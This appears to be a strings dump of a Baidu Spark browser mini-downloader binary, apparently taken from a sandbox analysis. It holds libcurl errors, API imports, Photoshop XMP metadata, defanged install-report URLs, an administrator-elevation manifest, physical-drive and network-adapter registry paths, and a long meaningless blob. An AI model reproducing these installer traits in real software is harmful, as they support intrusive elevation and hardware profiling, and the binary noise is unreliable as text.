FTP: unknown PASS reply

FTP: unknown PASV reply

FTP: unknown 227 response format

FTP: can't figure out the host in the PASV response

FTP: couldn't set file type

FTP: couldn't retrieve (RETR failed) the specified file

HTTP response code said error

FTP: command PORT failed

FTP: command REST failed

Operation was aborted by an application callback

A libcurl function was given a bad argument

An unknown option was passed in to libcurl

SSL peer certificate or SSH remote key was not OK

Problem with the local SSL certificate

Peer certificate cannot be authenticated with given CA certificates

Problem with the SSL CA cert (path? access rights?)

Unrecognized or bad HTTP Content or Transfer-Encoding

Invalid LDAP URL

Issuer check against peer certificate failed

Login denied

TFTP: File Not Found

TFTP: Access Violation

TFTP: Illegal operation

TFTP: Unknown transfer ID

TFTP: No such user

Caller must register CURLOPT_CONV_ callback options

Error in the SSH layer

Unable to parse FTP file list

Protocol option is unsupported

Protocol is unsupported

Socket is unsupported

Operation not supported

Address family not supported

Protocol family not supported

Winsock version not supported

Unknown error %d (%#x)

d:d:d

d:d

%c%c==

%c%c%c=

%s xxxxxxxxxxxxxxxx

00000001

12345678

%s/%s

username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s

0123456789-

; filename="%s"

%s; boundary=%s

Content-Type: multipart/mixed, boundary=%s

Content-Type: %s

couldn't open file "%s"

--%s--

SYN.ACK

ACK.SYN

XXX

E:\Jenkins\workspace\MiniPackage\build\Release\bdMiniDownloader.pdb

WS2_32.dll

HttpSendRequestW

HttpQueryInfoW

HttpOpenRequestW

InternetCrackUrlW

WININET.dll

SHLWAPI.dll

IPHLPAPI.DLL

PSAPI.DLL

PeekNamedPipe

GetCPInfo

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCloseKey

RegEnumKeyExW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

ole32.dll

ShellExecuteExW

SHFileOperationW

SHELL32.dll

GDI32.dll

GdiplusShutdown

gdiplus.dll

WSOCK32.dll

WinHttpCloseHandle

WinHttpGetProxyForUrl

WinHttpOpen

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

WLDAP32.dll

?456789:;<=

!"#$%&'()* ,-./0123

<4,$?7/'

(3-!0,1'8"5.*2$

zcÁ

.?AVCMD5Checksum@@

"iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:40F702BB9E9011E38C119B9D36C7DD62" xmpMM:DocumentID="xmp.did:40F702BC9E9011E38C119B9D36C7DD62"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:40F702B99E9011E38C119B9D36C7DD62" stRef:documentID="xmp.did:40F702BA9E9011E38C119B9D36C7DD62"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:4B92474C9E9011E39814DABADC782ABD" xmpMM:DocumentID="xmp.did:4B92474D9E9011E39814DABADC782ABD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:4B92474A9E9011E39814DABADC782ABD" stRef:documentID="xmp.did:4B92474B9E9011E39814DABADC782ABD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2F6B0F666F5311E2B37994BB203073E2" xmpMM:DocumentID="xmp.did:2F6B0F676F5311E2B37994BB203073E2"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F6B0F646F5311E2B37994BB203073E2" stRef:documentID="xmp.did:2F6B0F656F5311E2B37994BB203073E2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>S

fiTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:FF49499E6F5111E2A669A1961A88CA63" xmpMM:InstanceID="xmp.iid:FF49499D6F5111E2A669A1961A88CA63" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E90FAD22AE6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>)

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:1D7D666F7BFE11E2BD6AA411B2620E95" xmpMM:InstanceID="xmp.iid:1D7D666E7BFE11E2BD6AA411B2620E95" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:FB83E61E3E6FE211AA95A89280EC434B" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:DABEBB0F7BFD11E2AB119E5A44D0BEB7" xmpMM:InstanceID="xmp.iid:DABEBB0E7BFD11E2AB119E5A44D0BEB7" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E8C996E5897AE21186448A62D3D64C02" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:2720BC0E7BFF11E2BBE3A94C3F17A90B" xmpMM:InstanceID="xmp.iid:2720BC0D7BFF11E2BBE3A94C3F17A90B" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:60EEDFAFD57BE2118007B0063BB2D839" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>r

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D" xmpMM:DocumentID="xmp.did:586FB3776F5311E29AF5F39FDCE96E0C" xmpMM:InstanceID="xmp.iid:586FB3766F5311E29AF5F39FDCE96E0C" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DE459A23AD6EE21188A8A102A34B470D" stRef:documentID="xmp.did:11DAFFFF7B6EE21188A8A102A34B470D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>'

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BE655707A5E11E2A6F3F91090C2A9F8" xmpMM:DocumentID="xmp.did:8BE655717A5E11E2A6F3F91090C2A9F8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BE6556E7A5E11E2A6F3F91090C2A9F8" stRef:documentID="xmp.did:8BE6556F7A5E11E2A6F3F91090C2A9F8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:1BC804D76C6D11E399F1ECB53FDD5265" xmpMM:DocumentID="xmp.did:1BC804D86C6D11E399F1ECB53FDD5265"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1BC804D56C6D11E399F1ECB53FDD5265" stRef:documentID="xmp.did:1BC804D66C6D11E399F1ECB53FDD5265"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>x,

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:8BD4B6966C6E11E39AA9E7C5479B4D87" xmpMM:DocumentID="xmp.did:8BD4B6976C6E11E39AA9E7C5479B4D87"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8BD4B6946C6E11E39AA9E7C5479B4D87" stRef:documentID="xmp.did:8BD4B6956C6E11E39AA9E7C5479B4D87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>A

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:EAB2B8459E9311E3A802CF8194EE1EBF" xmpMM:DocumentID="xmp.did:EAB2B8469E9311E3A802CF8194EE1EBF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EAB2B8439E9311E3A802CF8194EE1EBF" stRef:documentID="xmp.did:EAB2B8449E9311E3A802CF8194EE1EBF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

.ve\@

l.upzY

<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>

6'7J78`8}8

< <$<(<,<0<

7 7$7(7,707

8$8(8,808^8|8

=$=*=2=@=\=

; ;$;(;,;0;4;8;<;\<

9 9$9(9:9

3?3`3{3

4O4`4{4

7’9C9H9M9':G:

5!5'535@5

99p9v9

1 202[2`2

=$=(=,=0=4=8=<=@=

>(>/>4>8><>]>

>&?,?0?4?8?

3,52585{5

0094989

; ;$;(;,;0;4;8;

6$6<6@6\6`6

Eiexplore.exe

E-%%

1.0.0.0

HTTP/1.1

hXXp://en.browser.baidu.com/report/install.cgi?

SparkMiniInstall.ini

JhXXp://en.browser.baidu.com/query/package.xml?

Jspark.exe

Software\Microsoft\Windows\CurrentVersion\App Paths\Spark.exe

/ChannelLaunchURL

Advapi32.dll

%s 0%%

%s -%%

/ChannelLaunchURL=

..\spark_install.exe

spark_install.exe

en.browser.baidu.com/license.html

en.browser.baidu.com/policy.html

en.browser.baidu.com

id.browser.baidu.com/license.html

id.browser.baidu.com/policy.html

id.browser.baidu.com

Portugu

br.browser.baidu.com/license.html

br.browser.baidu.com/policy.html

br.browser.baidu.com

th.browser.baidu.com/license.html

th.browser.baidu.com/policy.html

th.browser.baidu.com

%d.d.d-d:d:d

%s, Call DownloadOver, percent=%d, RetCode=%d

%s, DownloadRet = %d, costtime = f

%s, costtime = f

%s, Exception

%s, Start New Channel : %d

%s, limit download speed

%s, Error : Url or Path NULL

%s, Error : Url or Path empty

%s First DestPath = %s

%s URL = %s

%s, Error : work thread start

%s, Error : Path can't write

%s, Error : CreateDirectory fail

%s, Error : Path no legal

%s, Error : Re In

F%s, End

%s, Start

X-X-x-XX-XXXXXX

%s, GetLastError=%d

%s, percent=%d, Speed=%I64d

%s, want to StopThread

%s, StartNewThread : %d

%s, cookie = %d

%s, It should not happen

%s, Stop Thread

%s, Fail download : retry times = %d

%s, Fail more than max retry time!!!

%s, Network error

%s, CTimerStartChannelTask Stop Thread

%s, Stop a Channel : %d

%s, CDownloadPartOverTask StopNewThread

%s, Respone = %d

%s, curl_easy_perform = %d

%s No Valid Dest Path Error

%s No ReuseSameFile : RemoteFileSize no same

%s No ReuseSameFile : configured size big than remote file

%s No ReuseSameFile : channel num error

%s No ReuseSameFile

%s url md5 = %s

%s, First Start StartNewThread : %d

%s, Call DownloadStart

%s, MemMap UniqueID:%s

%s Final DestPath = %s

%s Big File No NTFS disk

%s, DeleteFile GetLastError=%d

%s No Support Range

%s remote size = %I64d

%s, GetRemoteFileSize : Retry = %d

%s, GetNetFileSize Respone = %d

%s, GetNetFileSize curl_easy_perform = %d

%s Proxy: %s

%s IE Proxy: %s

%s, Network Error

C%s, no gnet file

%s gnet info: %s

.gnet

%s, cookie:%d, responsecode:%d

%s, mapFile Write Error

%s, cookie:%d, head:%s

127.0.0.1

https=

http=

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

mscoree.dll

WUSER32.DLL

\Baidu\Common\I18N\conf.db

%s(%d)%s

\test4822FBB5_0309_420f_9DA2_FA5B8B854947.txt

%dddddd

XXxXXXXXXXX

\/:*?"<>|

SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

\\.\PhysicalDrive%d

\\.\Scsi%d:

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\21.6214035581797\bdMiniDownloaderEG_MENAON-Mini_32_3313.exe

1.0.0.2

bdMiniDownload.exe

spark_install.exe_2464:

.text

`.rdata

@.data

.idata

.ndata

.rsrc

@.reloc

<q.us

FTPjKS

FtPj;S

C.PjRV

xSSSh

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

Data Error in encrypted file. Wrong password?

CRC Failed in encrypted file. Wrong password?

Unsupported Method

Can not open encrypted archive. Wrong password?

Enter password (will not be echoed):

-p{Password}: set Password

2c3lv9u26-esj2dz35u03opwb0heesnpkgp5yntrtam54o3urljj7ddubcd4rf2vz4fvqm2z-km95y2p3ecv-awhwlawd08q8ogq5rgxwy82tbto84ttyw6d6s726m9rxhyurtskothyvp-r9dgtibaktl6-ufycbloh1ehsjo0rxph6qfc8ce7t6030ffrwcb0vosllgcu4-02w4apggcap6li4jb58oba6b8ho7rn-r52dgwqqd27yq7oh1u8zx73ws5ntx1wlfb1o56-wko5z71pqhty8h8fmc0x71pumljru4i2qnjno3sy-h75vuk4aouqyjkx-x-q19y6kq3xzdygka9zchstj322hu-4rm8tibi74fravrn6sj6epf3sszizj-f0xboz8iw03eqitce93sqohyscug1zrs8v1qu76f94eg8c-btd5jd5pbcggrtg6omviyugk7ton3-k7c8l6avrvhadfgcdf10zeccfmxg7j8rkf8zz3q8yveq6k9h71l7e81547c3c2fqsr-wchsmqbnl7jdfwdq1y3ajxy1scvqy3h127m7nsxatvjtn4el-zuhrilltum7dmdda9b1gppx97og5rzgh4aarzyaenpd36847atu5tje3itb1-03sfiuo2gz0aw0dr20490eagu1fpdi4qm3jmdemylror2aq6ggkibes6qgipc7dkx3isqpxqxsirqzishq1d-43cdudgbgdtjw4h0jcp7mkt99l8pw8ieuigpe2g58clv4oh4o1xqvmbibvu4sc87e0kfz3mv55c0-94acv8z2-ku0rarbfzs0cfa04a7p3onwfdu4vurq39tibalwjep0kaytnh80wc6759gqh8hs8dzq95o-6ywsj7t9o6nguy6iiyg4sq3-f846-tmohz3wpj9maga4jhnmkglw7boj6efsdx3adr5ghcfrexq67xjseh90hgpqiwgxtn5z01pog5cfeepwm4fqobdamaxa4kbnn15qvnxgjihraxldf6zvkrzxcapeoyriaf71yfyqa4vtpc3f711llft4ewp9s19002op-6wf3t7x2glkhph2j1h4jy7t4dqv-mkesbuonjnpbpao93mf6fdpmcmo4hqgzj54pe-fbmad2wdon6rjn1513unkqbl3wdmrtzm7hmjefea7pz8ztp-38x1lwz2qlxe4bgx-uqzucoe7y-6l7zsd6dago7wff0z8v18zbqksn0gd66dszndt3se38c3ic2vbhfwq9x9slx5q3kcaz69uly1jfu9zbisl0eu61upknbdubvuwv21glrfuau6iuw24wpi8v2386gz23zkjjr5dx5rf-y5tzvjp2w6aw9b1iadwof8-orgusa8sd7ew7c1gg3czurbz8j1ic2s-npkmo9nufltzemxbpxkyksf2262gj7aijglwj7skab75z68bx0zquvgzel4nxd62bmujsoss7i6rh6ytai5-cts382vitwhl1u0t52k6zbh7h3jomtdcyja4ha70oozaopf1t7ren6blu4gjsofkh4hqs9nrxneik2ckyiz2t86fi80dh3ipymz93a4qiod0uglj0qc5nsjtj11vk-42o01d0boty4pu1hpq6vx6afntzx82bljg07p-rp2-xdkt3bqdgrx0gxfg0wzaid4wyntafsfdexwddbo4vpftqa35a9chk4ldbamztgc03fxtk9ul-5q55-djive3lxsuivhue85p8ssd6k4gmo5b2r141s7pwdyvk9rqk-ka7m913wmvq5tjw4pf7-w7yzjqyq6jz7g12pzge-4lagdctsceu8bkebt2rj145t5toyifa9mnundyfoah6rvorq9en0v27f-8feqv-brxs8agkhyw1uoriadd-egu7-7k57hd-rcv9f8vamt0zqfchet01clbhlpw6p377a7fe4czw9dtgfk1cvcserdt-22wn32n1w0drlae13412c57mlq0qciwt0wj3uczwatmqqk0-u-5mhnskyi7ueqifkkul-hplez3mm2tnee8v0bffi8rr4gqqr3svbud4ixe7q0q4o3vgzn1ah005jexmo2nrvfc2avpu4st0dl43ysox08qirvtqqdkgt07rk47ws4zllxfhl198cqvkomiy4b36ajh4gc84chx305im-awsabtytvb8hgrxpy89xol4e7-5x7-p48yzpvdf8bm9vp50x-sj2fiiedxxqizl4kf89ekhn5utt89ghnz47at1dyrdvm6jlt1f2fq0l2ilt109au-8p6l69blp9gl8rtabfdduduueia812s4-vpc5qcj778qr-3nkhdtaihl2b1scnkr09o06324cemsbr7ln-bf6q6csanjl4hxh68-wbjcoih31njkdhqcn72nbb8hkdzal-0b-m4dvhe1p4ji8y8z1jrdd6gp865m3kpj3wj87h8x9k25f02w0r2xvxlfo5ebjzv6ewsmhg2du38y5vdvlxy8gv76d2yb2vpnv11xwhal0gad0tw9ys6h99k3s2x9t448hzf3xtvhmi5d12ky9hvijxuelt4-qzeh8mg8jewlsgwsbtu7s5gd24mfjx78ga7hofq5wx230gnhciyeigk6j9mejbmodc9vyc8-mitb3-h7yx9ts4vq0g22c5zagxu5aticiusa1w8lf1daz7ejsrix04ktm26qn0cq7jjlhichz2xiu1h7pfta38cs4j7l3tl8es4ugf5f607imgs6vagm9ucig03i1vsadof2976kttlcwm7hhnbyhceuw6ru6g8reucmjc57spsvci73kgc5snaw0jhx112knrc3u4hrixc6g0jaacylb4r-9g7z1ccwscbkv4dh1hipc0mojq51w4e2lzk46x1rc6m6tgr8ytq4b9ucvub6ytwepm8pc2lyn7pxby5hh4lzya-iz686eswlbjnfdr1m2fs0rl836k232-j63u9-tbxuioeyk-swylzmguits68hy6xc-idypun8127tjy6qu78i4a1jx26qmoretjdxhherpqngme4q71rdaiv7upagrfxfly4fodmln4479udeimiyokge1g2b9b-c0hepbgyq6yj98eslukpnwu28mln2tgoofi2kftzaeymngv70s3aypofss3jdm0bz0um665rex9xh1mz57q4ouiudid-1e3mwax95094onz6yssesmih276ema5ent66a7aknc8ncplr1xo1admyuqmtglokm8c0iax-6l4coaiwts5ouaqyoolp39j5mfebuzedi8i4rimigyrfflzh3t7bu0---vfepxg15412gsq2wts99cw12l2l9bmijgusrrnhwfi-ua1j8tqfydoc0a58c93mevx3v2p7weayddcz0fonvaadxe1jt08appbbuhghd6jt0ir1h2g3godp-cwaysvwsprk2ht3ilf8od0msli5rxlxucpa0n-7fz3h6hueheln83igx8xc8zju88a0fku081dumeac-rstnoj8pvijhlmswr7m9egh63y5mgi2mkm344i4yfje2itxpbp164bxqt8657l2pcrk120c6e-0lyyzgnbvu7io4kyyowjecc1-fcm6xspbn0yt0l0oi8hbtdicthxswvthn8c--yoxt322d8pk97zj8uq02qzo1fptumj5x97x-0apmgpfwzhgb--8hzn01lcobh2u-7qlxll2nbgl9h8164mzkqri19uhutz7hmgr83b3p08lnmu5tsaliw121es16q8aevchlsopxymabg51jq3ccy4wa9-bd0g0ja0fot0q2qm8gspb-2uwx86484h64qfm2d36az12h8kytmwogglpk7kqa23sw3udwvh1yg7q156dwo092-9955q5nz5k0372kygllaeoaxqzydo5s5btahmfbaviz0c58kbif2-0-j7yvwnzm1bgqmr9l-e1u6me43ervsnw7o1uania3rm4uejxdyxkcywpqqhmpvvccjzqvzqkai9ie5tjsg5b802b4nqttkl5o3hnwejfh5v2ai6gg5322chia270bhruyjnsy9fee1ngyeliem7cink0egw7ztblhc801k84u0317e8g9-ndptauyxnlvljb8uv-j9f6uerae5v1zkrt81mqp7d2t0ihmugfj58-wtfp85ul9ruxxb2fvan20c1jx8j-x3xp5j4i9o-zr08mo6d5-tsy-mze3ithss2wyw41gevjjlplf6djlnemwdaby2y1xdv507fz6yygo5m5ruys88u4y7liyi--8qnxnk1xfwvx41et2p95-flmu89t5wvuye3aww255w31e2estuiqj0by1b15wgdzhlo--f7f9an0biujq9am1w-5auyhickxluwrv-ojko1fnf6kpk9ohaver5c7mi5on484qnyr4nysos8t7hsjd5-cjb4j5fp-8b24hz82t-00w6vs-ed423httu-g8ze26bqrd7svk-b1gjjwe13v6gv0jngjgl942a-pu4qc9bt3niyy84vp28tplh90pngsnl-yr74di41nwh31eh7532n6qpjuk7woimqu2u7dv8c6g8qh9kw26nd688s12p02jz2by0k781c153cba5glyi2u-4xoea9z40lvqjmfzfz2h3n0cd09ztfo8mwr27ukyofcl5mkg9jwbjb2ijeessr90kkp8k0dyv6bedtsiidu619qe43a1omniu9ec6c5xmzsb6twoy7koukfg1lxh0yc0-g7tqs73m6ga-v9jcrpq1rzh45c76e77o-vjv81jh-a9z9nq4mzlingqa3ngv2s-xho9uwhd0czr-j8ntqfanjem8mfqg9mwsc820awfitop0261c1grk5-tar6ojic2feaz01jp29bh23jreok5ndnffjziay4tyc3cfz3tvszilo7iancyriu9iqxyq3sqjxm7a96-rahifn6wg1t3jtgzhiff3bcpp-ig2a4az1ur0o72nkey8m7kxqau3fvmm1f1s9tv13-8qbpdh52migg908528uixtu9ipcwbvubbsulp66qoqvqis8l5no08rzg8hxe0nb5v27mefd5oqdfwk3t2vafrce-auvc2tkcs96y9o6m3tw0e8s1gyyf7vz4h42gjxrl21zzphy2tz5iffp96z-a74p-5evxt0ti84abkmowdz09a3oqa6s1d-wcsjvsvo-lenrza6rcdd0tal6yrhnepi9-vs79ky4b1231j1b9fg-xsit68l8inv0lpk4pknh4n447qe8may4h5q5nhpv8gx7bzgld7eg-ujvxdwtnsaccob9wrohu7g2sten2i68cbsbjc41tb4nmk0vl2ub6kph0o5msm-ba6w3tbudxbewhamgs3qgck05pk-gr7vuomqvo8vltf43qwddjbyd01849fyk2vz--mml4xusox3moo0xlsfj7my87xz7a-le66xrqt6b-hk9r068nb6fjqlze7p263jjynfry7yg83r8aamre7gb1w71oh472zxakai3vxe5hys63ngv71qzhucjv8p8pxeaa3-q4fknuhvk0u8mwz5cc-xme3qhf0x0uen1-f5bcb1rlaav1b6gt-ch623--7qs42z-j04-29o9-hj0-hc6sh-lfjpzw82-yernm-j3op3gar8978bs2j72b-f8z797nffok8ht46fxxtw8dj06a5nejp8e-sznmrfquewkbl0a00dzlhv9r5ffm7cgbbqgs-fs4a426zebnwfscauoe5iueco-g9xa3pbm4e2aiow2wyaw1vg1v2-aragimermrrx739qfaupxnli47zn66518xdde2yll5s2qniajsopwv18i4gkyrdpz24yfgjlh4z491bzqafiwiwqhkp3hacr04a8ewuk84azi24yni19o6kpl0931d70w7y4ug7q0py728-66p4k839nn-ljwx3nrrdkqw5rx48dzwouaywfb35uhvzd-q2uhr-uv6lj8t7gy8k28-o52y8vr5dq1b6nqmzirwwxvm3qsyi95mev2o8p1zrd3f8yv40k02mqt2gq90tlrkgvgyfubj16y77gvue-hqb0mv2ehkyk96hqgy-yyy0s22xw35b22s5qo5unx7iod7lncouf6vtzvv8kpm7ot3yarrltpv1a1hpv97yng089ein0v4bok2yqzpeb1wej52ur2v2e2vnqxqu5vqadwplaikv3b8e54osmqp7xkv37ra-q1uhj82j62kie9ihrqxp3j8ici-2naem8j48xu2osa3m7uqqrjjq1ykdljgr6q3gulml3b63cqgmh-vvhwhl129z9xnfccb4dabmk2xglwrjf4or0r7rjnkwxvo0g2qdu1mggr43ncgb